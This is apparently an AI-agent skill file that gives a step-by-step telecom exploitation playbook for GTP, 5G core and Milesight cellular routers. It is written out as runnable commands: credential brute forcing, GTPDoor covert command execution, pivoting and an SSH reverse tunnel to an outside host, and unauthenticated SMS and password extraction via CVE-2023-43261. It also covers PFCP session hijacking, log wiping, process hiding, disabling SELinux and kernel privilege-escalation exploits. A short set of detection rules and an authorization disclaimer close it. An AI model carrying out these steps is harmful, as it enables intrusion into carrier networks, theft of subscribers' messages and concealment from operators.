Hacktricks-skills telecom-network-exploitation

Telecom network security assessment and exploitation techniques for GTP, 5G core, and industrial cellular routers. Use this skill whenever the user mentions telecom networks, mobile core protocols (GTP, PFCP, NAS), 5G security testing, SGSN/GGSN/PGW/AMF/SMF exploitation, industrial cellular routers (Milesight UR-series), GRX/IPX roaming backbones, or any mobile network penetration testing. This skill covers reconnaissance, protocol exploitation, covert channels, privilege escalation on network elements, and detection evasion in telecom environments.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation/SKILL.MD

source content

Telecom Network Exploitation Skill

A comprehensive guide for security assessments of telecom infrastructure including 4G/5G core networks, GTP protocol exploitation, and industrial cellular router vulnerabilities.

When to Use This Skill

Trigger this skill when the user:

Needs to assess telecom network security (GTP, PFCP, NAS protocols)
Is testing 5G core network components (AMF, SMF, UPF, MME, SGW, PGW)
Wants to exploit or test industrial cellular routers (Milesight UR-series)
Is working with GRX/IPX roaming backbones
Needs to craft GTP-C/GTP-U packets for testing
Is investigating 5G NAS security (SUCI, EEA0/EIA0, replay attacks)
Requires PFCP session manipulation techniques
Is hunting for telecom-specific attack patterns

Core Concepts

Protocol Stack Overview

Layer	Protocol	Port	Purpose
Control Plane	GTP-C	UDP 2123	Session management (PDP context)
User Plane	GTP-U	UDP 2152	User data tunneling
5G Control	PFCP	UDP 8805	UPF control (N4 interface)
5G NAS	NGAP/NAS	N2 interface	UE registration, authentication
Management	HTTP/JSON-RPC	80/443	Router web APIs

Attack Surface Map

┌─────────────────────────────────────────────────────────────┐
│                    TELECOM ATTACK SURFACE                   │
├─────────────────────────────────────────────────────────────┤
│  External → GRX/IPX → Core Network → Data Plane             │
│                                                              │
│  [OSS/NE] → [SGSN/MME] → [GGSN/PGW] → [UPF] → [Internet]   │
│     ↑           ↑           ↑           ↑                   │
│  Default     GTP-C       PFCP        GTP-U                  │
│  Credentials  Exploit    Hijack      TEID Spoof             │
│                                                              │
│  [Industrial Routers] → [SMS API] → [Carrier Network]      │
│       ↑                    ↑                                  │
│  CVE-2023-43261        Unauthenticated                      │
│  (Password Leak)       Query/Inject                          │
└─────────────────────────────────────────────────────────────┘

1. Reconnaissance & Initial Access

1.1 Default Credential Testing

Many vendor network elements ship with hardcoded credentials. Use targeted wordlists:

# Common telecom defaults
root:admin
dbadmin:dbadmin
cacti:cacti
ftpuser:ftpuser
admin:admin

# Brute force with hydra
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://<target> -t 8

Key insight: If the device exposes only a management VRF, pivot through a jump host first before attempting direct access.

1.2 GTP-C Listener Discovery

Map GTP-C services across GRX/IPX backbones:

# Masscan for GTP-C (UDP 2123)
masscan 10.0.0.0/8 -pU:2123 --rate 50000 \
  --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

# Verify with nmap
nmap -sU -p 2123 --script gtp-c-discovery <target>

Note: Most GRX operators still allow ICMP echo across the backbone, enabling host discovery.

2. Subscriber Enumeration

2.1 GTP-C Create PDP Context Probing

Use

cordscan

to enumerate subscribers and discover serving SGSN/MME:

# Build the tool
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Query a specific IMSI
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

What it reveals:

Current SGSN/MME serving the IMSI
Subscriber's visited PLMN
Network topology information

2.2 IMSI Format Reference

IMSI: 404995112345678
││││││││││││││││││
││││││││││││││││└─ MSIN (Mobile Station International Subscriber Number)
││││││││││││││└─── MNC (Mobile Network Code, 2-3 digits)
││││││││││││└───── MCC (Mobile Country Code, 3 digits)

3. Code Execution via GTP

3.1 GTPDoor Concept

GTPDoor is a covert channel that:

Binds UDP 2123 and parses incoming GTP-C packets
Decrypts payloads (AES-128-CBC) when magic tag is present
Executes commands via
```
/bin/sh -c
```
Exfiltrates output via Echo Response messages

Why it works: No outward session is created; traffic blends with legitimate GTP-C.

3.2 Crafting GTPDoor Packets

Use the

gtp_craft.py

script (see scripts/):

# Execute a command via GTPDoor
python3 scripts/gtp_craft.py --type gtpdoor \
  --target 10.10.10.10 \
  --key "SixteenByteKey!" \
  --cmd "id;uname -a"

# Send Create PDP Context probe
python3 scripts/gtp_craft.py --type pdp \
  --imsi 404995112345678 \
  --oper 40499 \
  --target 10.10.10.10

3.3 Detection Signatures

Indicator	Description
Unbalanced Echo Requests	Host sending Echo Requests without receiving Echo Responses
GTP Version 1 + Message Type 1	Deviation from spec (Echo should be version 1, type 1)
High-rate GTP-C to non-SGSN	Any device other than SGSN/GGSN creating PDP contexts

4. Pivoting Through the Core

4.1 SGSN Emulator + SOCKS5

Establish a PDP context tunnel to bypass signaling-only VLANs:

# Start SGSN emulator (requires OsmoGGSN)
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
       -APN internet -c 1 -d

# Add route through tun0
ip route add 172.16.0.0/12 dev tun0

# Start SOCKS proxy
microsocks -p 1080 &

# Use with proxychains
proxychains curl http://internal-service.local

4.2 DNS Tunnel for SSH Reverse

DNS is typically open in roaming infrastructures:

# From compromised host to VPS
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

# VPS must have GatewayPorts enabled in sshd_config

5. Covert Channels

Channel	Transport	Encoding	Use Case
ICMP EchoBackdoor	ICMP Echo Req/Rep	XOR (4-byte key)	Passive listener, no outbound
DNS NoDepDNS	UDP 53	XOR in A-record	`*.nodep` subdomain
GTP GTPDoor	UDP 2123	AES-128-CBC	Blends with GTP-C traffic

Common pattern: All implants implement watchdogs that timestomp binaries and re-spawn if crashed.

6. 5G NAS Security Testing

6.1 Registration Flow Overview

UE → AMF (N2/NGAP)
  ↓
1. Registration Request (SUCI + capabilities)
  ↓
2. Authentication (RAND/AUTN → RES*)
  ↓
3. Security Mode Command/Complete (EEA/EIA negotiation)
  ↓
4. PDU Session Establishment

Critical window: Steps 1-2 are unauthenticated and unencrypted.

6.2 SUCI/IMSI Privacy Testing

Check for plaintext SUPI/IMSI exposure:

# Wireshark filters
ngap.procedure_code == 15  # InitialUEMessage
nas-5gs.message_type == 65  # Registration Request

# Check for SUCI vs IMSI
nas-5gs.mobile_identity.suci  # Should exist
nas-5gs.mobile_identity.imsi  # Should NOT exist (privacy defect)

What to collect: MCC/MNC/MSIN if exposed; track per-UE across time/locations.

6.3 Algorithm Downgrade (EEA0/EIA0)

Test for null algorithm acceptance:

# Using Sni5Gect to patch NAS capabilities
python3 sni5gect.py --hook nas --patch eea0_eia0_only \
  --target 10.10.20.5 --interface eth0

# Verify in Wireshark after Security Mode Command
# Look for: Encryption in use [EEA0]

Mitigation: Configure AMF to reject EEA0/EIA0 except for emergency services.

6.4 NAS Replay Testing

Use 5GReplay to test replay protection:

# Capture registration
python3 5greplay.py --capture --output reg_capture.xml

# Replay with rule
python3 5greplay.py --replay reg_capture.xml \
  --rule initial_ue_message_forward.xml

What to observe: Whether AMF accepts replay and proceeds to authentication.

7. Industrial Router Exploitation

7.1 Milesight UR-Series SMS API Abuse

Unauthenticated SMS query/inject on exposed

/cgi

endpoint:

# Query outbox
curl -sk -X POST http://<router>/cgi \
  -H 'Content-Type: application/json' \
  -d '{"base":"query_outbox","function":"query_outbox", \
       "values":[{"page":1,"per_page":100}]}'

# Query inbox
curl -sk -X POST http://<router>/cgi \
  -H 'Content-Type: application/json' \
  -d '{"base":"query_inbox","function":"query_inbox", \
       "values":[{"page":1,"per_page":100}]}'

Response fields:

timestamp

content

phone_number

(E.164),

status

7.2 CVE-2023-43261 Password Recovery

Affected: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7)

# Extract encrypted password from logs
curl -sk http://<router>/lang/log/httpd.log | \
  grep -o '"password":"[^"]*"' | head -5

# Decrypt with script
python3 scripts/decrypt_milesight.py --encrypted "<base64_value>"

Key/IV: Hardcoded in client-side JavaScript (KEY=

1111111111111111

, IV=

2222222222222222

)

7.3 Detection Patterns

Pattern Indicator

Unauthenticated

/cgi

POST

JSON with

base

function

query_inbox

query_outbox

Capability testing

Repeated

POST /cgi

with

status":"failed"

to many numbers

Exposed logs

/lang/log/system

/lang/log/httpd.log

accessible

8. PFCP Session Hijacking

8.1 Session Modification Attack

If PFCP is accessible on N4, craft Session Modification Request:

# Use the pfcp_hijack.py script
python3 scripts/pfcp_hijack.py \
  --upf 10.10.20.5 \
  --seid 0x123456789abc \
  --pdr-id 7 \
  --far-id 77 \
  --sink-ip 203.0.113.55 \
  --teid 0xdeadbeef

Mechanism: Insert duplicate PDR with smaller precedence; some UPFs apply first match.

8.2 GTP-U TEID Spoofing

Inject user traffic by spoofing TEIDs:

# Craft GTP-U packet with known TEID
python3 scripts/gtp_craft.py --type gtpu \
  --teid 0x7ffed00 \
  --dst 10.10.20.8 \
  --inner-src 10.0.0.10 \
  --inner-dst 1.1.1.1 \
  --inner-dport 443

Prerequisite: Learn active TEIDs via passive sniffing on N3/N6.

9. SBA/SBI Fuzzing

9.1 Cross-Service Token Attack

Reuse tokens across NF services when audience checks are missing:

# Steal token from one NF, use on another
curl -sk -H "Authorization: Bearer $TOKEN" \
     -H "Host: smf.internal" \
     https://smf.internal/nsmf-pdusession/v1/sm-contexts

9.2 Automated Fuzzing

Use FivGeeFuzz with derived grammars:

python3 fivgeefuzz.py --nf nsmf-pdusession \
  --target https://smf.internal \
  --grammar grammars/nsmf-pdusession.json \
  --token "$TOKEN" --threads 8 --max-cases 500

Watch for: 401/403 bypasses, crashes in SMF/AMF pods.

10. Defense Evasion

10.1 Log Manipulation

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/<attacker_ip>/d' | \
  utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null
history -c

10.2 Process Hiding

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup
printf '\0' > /proc/$$/comm  # Appears as [kworker/1]

# Timestomp binaries
touch -r /usr/bin/time /path/to/implant

10.3 SELinux Bypass

setenforce 0  # Disable SELinux (requires root)

11. Privilege Escalation on Network Elements

11.1 Common Exploits

CVE	Target	Command
CVE-2016-5195	Linux kernel (DirtyCow)	`gcc dirty.c -o dirty && ./dirty /etc/passwd`
CVE-2021-4034	polkit (PwnKit)	`python3 PwnKit.py`
CVE-2021-3156	sudo (Baron Samedit)	`python3 exploit_userspec.py`

11.2 Cleanup

userdel <attacker_user> 2>/dev/null
rm -f /tmp/sh
history -c

12. Detection & Hunting

12.1 Network Detection Rules


udp.port==2123 and not src.ip in sgsn_range
tcp.port in (53,80,443) and tcp.flags.syn==1 and ssh.handshake
udp.port==2123 and gtp.type==1 and echo_request_count > echo_response_count
icmp.type==0 and icmp.identifier > 0 and icmp.sequence > 0
ngap.procedure_code==15 and nas.message_type==65 and same_source_ip
nas.security_mode and eea==0 or eia==0
pfcp.msg_type==MODIFICATION and duplicate_pdr_id
http.authorization.bearer and aud != target_nf

12.2 Asset Inventory

# Shodan queries for exposed routers
shodan search http.html:"rt_title"  # Milesight panels
shodan search "Milesight" "UR32" "UR35" "UR41"

# Google dorking
google "/lang/log/system" ext:log
google inurl:/cgi "query_outbox"

13. Tool Box

Tool	Purpose	Source
`cordscan`	GTP-C subscriber enumeration	Custom (Go)
`GTPDoor`	Covert GTP command execution	Custom
`EchoBackdoor`	ICMP covert channel	Custom
`NoDepDNS`	DNS covert channel	Custom
`sgsnemu`	SGSN emulator for pivoting	OsmoGGSN
`5GReplay`	5G NAS replay testing	Custom
`Sni5Gect`	Live NAS sniff/modify/inject	Custom
`FivGeeFuzz`	SBA/SBI fuzzing	Academic (2025)
`FScan`	Intranet TCP sweeps	Public
`Responder`	LLMNR/NBT-NS rogue WPAD	Public
`Microsocks`	SOCKS5 proxy	Public
`FRP`	NAT traversal	Public (≥0.37)

14. Lab Setup

14.1 5G Core Testbed

# Open5GS deployment (sufficient for most tests)
docker-compose -f open5gs-compose.yaml up -d

# Components: AMF, SMF, UPF, HSS, PCF
# Interfaces: N1 (UE-AMF), N2 (gNB-AMF), N4 (SMF-UPF)

14.2 Wireshark Display Filters

# NGAP InitialUEMessage
ngap.procedure_code == 15

# NAS Registration Request
nas-5gs.message_type == 65

# GTP-C Create PDP Context
gtpv1.message_type == 1

# PFCP Session Modification
pfcp.msg_type == 25

# SUCI vs IMSI
nas-5gs.mobile_identity.suci
nas-5gs.mobile_identity.imsi

15. References

Standards

3GPP TS 29.060 – GPRS Tunnelling Protocol (GTPv1)
3GPP TS 29.281 – GTPv2-C
3GPP TS 24.501 – NAS protocol for 5GS
3GPP TS 33.501 – Security architecture for 5G System

Research & Reports

Vulnerabilities

CVE-2016-5195 (DirtyCow)
CVE-2021-4034 (PwnKit)
CVE-2021-3156 (Baron Samedit)
CVE-2023-43261 (Milesight Password Leak)

Usage Notes

Legal compliance: Only use these techniques on networks you own or have explicit authorization to test.
Lab first: Always validate techniques in a controlled lab environment (Open5GS, OAI) before field deployment.
Documentation: Record all findings, including false positives and detection bypasses.
Tool updates: Keep custom tools updated; telecom protocols evolve with 3GPP releases.
Defense perspective: Understanding these attacks helps design better detection rules and hardening measures.

#	Detection	Query Pattern
1	Non-SGSN GTP-C	`udp.port==2123 and not src.ip in sgsn_range`
2	SSH on non-standard ports	`tcp.port in (53,80,443) and tcp.flags.syn==1 and ssh.handshake`
3	GTPDoor beacons	`udp.port==2123 and gtp.type==1 and echo_request_count > echo_response_count`
4	ICMP covert channel	`icmp.type==0 and icmp.identifier > 0 and icmp.sequence > 0`
5	5G NAS replay	`ngap.procedure_code==15 and nas.message_type==65 and same_source_ip`
6	Null algorithm negotiation	`nas.security_mode and eea==0 or eia==0`
7	PFCP hijack	`pfcp.msg_type==MODIFICATION and duplicate_pdr_id`
8	Cross-service token	`http.authorization.bearer and aud != target_nf`